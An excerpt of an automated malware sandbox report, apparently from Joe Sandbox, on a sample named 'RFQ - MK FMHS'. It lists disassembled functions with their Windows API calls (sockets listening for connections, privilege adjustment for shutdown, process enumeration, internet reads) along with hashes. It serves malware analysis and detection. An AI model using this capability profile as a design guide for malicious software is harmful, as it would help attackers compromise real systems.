                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    • Opcode ID: 97c25119347dbf2d16dfee693a7ac082d2b5a0a2fe43f2833caea95ec18885a3
                    • Instruction ID: 3b47332119272f1f43b3bebea50c3e684f708597acd0cd3140f6d98a36eb8229
                    • Opcode Fuzzy Hash: 97c25119347dbf2d16dfee693a7ac082d2b5a0a2fe43f2833caea95ec18885a3
                    • Instruction Fuzzy Hash: 9B014733654A112EF7285678EC4AFBA7258EB01356F242027FC27F22D2DA910C828192
                    Function 00E83190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID: Oa
                    • API String ID: 674341424-3945284152
                    • Opcode ID: 74e7a650a79964a1e8ed0bb6f16f9b7171b531f52c48db8d89d6f862c1388c1a
                    • Instruction ID: 9f64e8c7f2f2d6433cbf2ee6dafd5c82d943ed0071aed796d90101df441f13d5
                    • Opcode Fuzzy Hash: 74e7a650a79964a1e8ed0bb6f16f9b7171b531f52c48db8d89d6f862c1388c1a
                    • Instruction Fuzzy Hash: 93228D715083019FC724EF24C891BAFB7E5AF84714F10A91DF99EA7291DB71EA04CB92
                    Function 00EE6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                    Download Yara Rule
                    APIs
                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00EE65EF
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE65FE
                    • bind.WSOCK32(00000000,?,00000010), ref: 00EE661A
                    • listen.WSOCK32(00000000,00000005), ref: 00EE6629
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE6643
                    • closesocket.WSOCK32(00000000), ref: 00EE6657
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    • Opcode ID: a679d045020eaa12b4e838267f49c1a5192b30c54b19877768cc1e569d1c8733
                    • Instruction ID: 8330296ce7effc8085e406e371230b33112d0fda3a7cedfba9309f7c16d171b8
                    • Opcode Fuzzy Hash: a679d045020eaa12b4e838267f49c1a5192b30c54b19877768cc1e569d1c8733
                    • Instruction Fuzzy Hash: B221CC312002049FCB00AF25C889B7EB7F9EF88364F109169E91AB73D2CB30AD05CB50
                    Function 00E71287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E719FA
                    • GetSysColor.USER32(0000000F), ref: 00E71A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00E71A61
                      • Part of subcall function 00E71290: DefDlgProcW.USER32(?,00000020,?), ref: 00E712D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ColorProc$LongWindow
                    • String ID:
                    • API String ID: 3744519093-0
                    • Opcode ID: 4cff6b8997b503114627e850308ed001af3a54f1d3b6aaf31b96139cb0c04d31
                    • Instruction ID: 9bffc5bcbe9df5f98d1ff278de3f133aa10bfa683a4c048ebb43728046be5b72
                    • Opcode Fuzzy Hash: 4cff6b8997b503114627e850308ed001af3a54f1d3b6aaf31b96139cb0c04d31
                    • Instruction Fuzzy Hash: ABA16970105788BAD628AB2C6C44DBF359DDF8A359B24F15EF50AFA192DA10DD01E272
                    Function 00EE6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EE80A0: inet_addr.WSOCK32(00000000), ref: 00EE80CB
                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00EE6AB1
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE6ADA
                    • bind.WSOCK32(00000000,?,00000010), ref: 00EE6B13
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE6B20
                    • closesocket.WSOCK32(00000000), ref: 00EE6B34
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    • API String ID: 99427753-0
                    • Opcode ID: 1ba7b5548406c9ef0d9eb6ddebecc60a0f56f1edc1a1724af323fd419d00bb8a
                    • Instruction ID: 5cd3399b225efbb0fae93ff0ac14b1c97ab30a6959e18818a6a51503673692f7
                    • Opcode Fuzzy Hash: 1ba7b5548406c9ef0d9eb6ddebecc60a0f56f1edc1a1724af323fd419d00bb8a
                    • Instruction Fuzzy Hash: 0E418275640214AFEB10AB649D86F7E77E5DF84720F04D058FA1ABB3D3DA709D018B91
                    Function 00EF55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    • Opcode ID: ff0e8659ed2d99806cc2eda389b0d000e82400803c713c15072bc38f97516c91
                    • Instruction ID: 014f499e43d330ddd2c0a91800ed1fef43ab8598299eb7150fbc15d2fe633f73
                    • Opcode Fuzzy Hash: ff0e8659ed2d99806cc2eda389b0d000e82400803c713c15072bc38f97516c91
                    • Instruction Fuzzy Hash: AC11B6323009155FD7115F26DC44B7F7798EF94721B469429E71AF7241CB309901CA95
                    Function 00EEC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00EB1D88,?), ref: 00EEC312
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EEC324
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    • Opcode ID: e152b9e32328f4163f516240563595bd4693c1b84d5e78c1d8ce929e6f813d71
                    • Instruction ID: f19106fdc89d47aaf0988682bfd1a8eb89f23c704f17425cc18ea9297fb8509f
                    • Opcode Fuzzy Hash: e152b9e32328f4163f516240563595bd4693c1b84d5e78c1d8ce929e6f813d71
                    • Instruction Fuzzy Hash: 49E0C270200317CFCB304F2BD804A9676E4EF48709B90D479E895F2310E770D842CB60
                    Function 00EEF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00EEF151
                    • Process32FirstW.KERNEL32(00000000,?), ref: 00EEF15F
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                    • Process32NextW.KERNEL32(00000000,?), ref: 00EEF21F
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00EEF22E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    • API String ID: 2576544623-0
                    • Opcode ID: 475dcff6d509da2f67fa074208ceb17ad0670c8e5dccc60a0c0f7c442bfbf0a0
                    • Instruction ID: 69bf57b987b5f34b7f61942af1c465315cd762662c13b28b9d3162ef7b8571c5
                    • Opcode Fuzzy Hash: 475dcff6d509da2f67fa074208ceb17ad0670c8e5dccc60a0c0f7c442bfbf0a0
                    • Instruction Fuzzy Hash: A8517D715043059FD310EF25DC85E6BB7E8FF98710F50982DF599A72A2EB70A908CB92
                    Function 00ED40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00ED40D1
                    • _memset.LIBCMT ref: 00ED40F2
                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00ED4144
                    • CloseHandle.KERNEL32(00000000), ref: 00ED414D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle_memset
                    • String ID:
                    • API String ID: 1157408455-0
                    • Opcode ID: a2a5b293e03e1b33f90e47453ef068324d88352521f547d8ad3c4138881ff13d
                    • Instruction ID: e7f9e24d89909f84eda4927200f473095ccf1047cefca1e598fc7dfad1b4e046
                    • Opcode Fuzzy Hash: a2a5b293e03e1b33f90e47453ef068324d88352521f547d8ad3c4138881ff13d
                    • Instruction Fuzzy Hash: 5C11AB759012287AD7305BA59C4DFABBB7CEF84764F1041A6F908E7290D6744E84CBA4
                    Function 00ECEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00ECEB19
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    • Opcode ID: aecd9245ff34834a100e2844a13cd7c5fde9bb6e1f1ef8bda9d6858e5b5d5d9c
                    • Instruction ID: 614e44b1dac72dcfc8f0015c4eaeb52e1ad19fa5bbe6b7a5748f0dabd38bf717
                    • Opcode Fuzzy Hash: aecd9245ff34834a100e2844a13cd7c5fde9bb6e1f1ef8bda9d6858e5b5d5d9c
                    • Instruction Fuzzy Hash: AD322575A006059FCB28CF19C581EAAB7F1FF48310B15D56EE89AEB3A1D771E942CB40
                    Function 00EE25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00EE26D5
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EE270C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    • Opcode ID: 793616ee027bbcf0f181a3138e82067b426cb90d2cb162ed5df7797ecde75741
                    • Instruction ID: 5b3376bfb26505a21f32c4d64c0a1bb6e6195bd4fb0d0b7c7cd3aa93bb0a805b
                    • Opcode Fuzzy Hash: 793616ee027bbcf0f181a3138e82067b426cb90d2cb162ed5df7797ecde75741
                    • Instruction Fuzzy Hash: 6541D57190024EBFEB20DE96DC85EBBB7FCEB40758F10506EF705B6140EA719E419654
                    Function 00EDB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EDB5AE
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EDB608
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00EDB655
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    • Opcode ID: 16ea95d2af758aa843e38304d5037bc448d2806e2219c6bfb602b3c5e4e31e41
                    • Instruction ID: 836378fab2864bdac97aeba4f358821aaee722dbda413ed28bda10d639744313
                    • Opcode Fuzzy Hash: 16ea95d2af758aa843e38304d5037bc448d2806e2219c6bfb602b3c5e4e31e41
                    • Instruction Fuzzy Hash: 2B216235A00118EFCB00DF55D880EADBBF8FF88310F1480AAE905AB352DB319916CF51
                    Function 00EC8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
                      • Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC8D0D
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC8D3A
                    • GetLastError.KERNEL32 ref: 00EC8D47
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    • Opcode ID: 838f4dbb95285939a5de2524ddecfb5e6d4f93ef5b817c026218593a34997798
                    • Instruction ID: 7b0e31f35bf6be88041e24455408a00d80ccf44128a59f8e07e0f9cbc6685f5f
                    • Opcode Fuzzy Hash: 838f4dbb95285939a5de2524ddecfb5e6d4f93ef5b817c026218593a34997798
                    • Instruction Fuzzy Hash: 10116DB1514209AFD7289F54DE85D6BBBFCEB44710B20852EF456A2241EF31AC418B60
                    Function 00ED4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                    Download Yara Rule
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00ED4C2C
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00ED4C43
                    • FreeSid.ADVAPI32(?), ref: 00ED4C53
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 7ee9dce70d9ed97a9b7f2c9c0dca0239eee95fe2dccadad5d83dac8acab15ae4
                    • Instruction ID: 671c71b2a301a32525eab2a65aa8df202d090b04bb2b742b9f98d632a293d196
                    • Opcode Fuzzy Hash: 7ee9dce70d9ed97a9b7f2c9c0dca0239eee95fe2dccadad5d83dac8acab15ae4
                    • Instruction Fuzzy Hash: E4F03775A11208BFDB04DFE09C89ABEBBB8EF08201F0044A9E905E2281E6706A088B50
                    Function 00E7E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 147afd07824607f10450f189fc59996da27b4d9676b5cc1da13ec512d6562e08
                    • Instruction ID: 994b4e574aeec706a294ae2e4fa253f1851049477479d7f9424e60d9a35fab19
                    • Opcode Fuzzy Hash: 147afd07824607f10450f189fc59996da27b4d9676b5cc1da13ec512d6562e08
                    • Instruction Fuzzy Hash: 3D228D74A00216DFDB24DF64C481AAABBF1FF08304F14D1A9E85ABB351E735AD85CB91
                    Function 00EDC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00EDC966
                    • FindClose.KERNEL32(00000000), ref: 00EDC996
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 25273a6558c6ff5d7a3a17bec0fd11a084b5b2002ed65acc075d081338416d5d
                    • Instruction ID: 4a7d9757ca57d1f3ed5acc12c8a0967ea89ad363cd917b0a61e6392d7ed9505a
                    • Opcode Fuzzy Hash: 25273a6558c6ff5d7a3a17bec0fd11a084b5b2002ed65acc075d081338416d5d
                    • Instruction Fuzzy Hash: 34115E726106009FDB10EF29D855A2AF7E9EF84324F10955EF9A9E73A1DB30AC05CB81
                    Function 00EDA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00EE977D,?,00EFFB84,?), ref: 00EDA302
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00EE977D,?,00EFFB84,?), ref: 00EDA314
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: c3f0b4f9b6cfe575ee754285653382f869a12a6a8e91a9f8eaed092536444aa7
                    • Instruction ID: 6aac9e024ea3193759e6b5ec6c4eedb8abd3fa0ba0a5655a25aa8146bd4c24fa
                    • Opcode Fuzzy Hash: c3f0b4f9b6cfe575ee754285653382f869a12a6a8e91a9f8eaed092536444aa7
                    • Instruction Fuzzy Hash: C0F0823554522DABEB209FA4CC48FEA776DFF09761F008166F908E6291D6309A44CBA1
                    Function 00EC8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EC8851), ref: 00EC8728
                    • CloseHandle.KERNEL32(?,?,00EC8851), ref: 00EC873A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
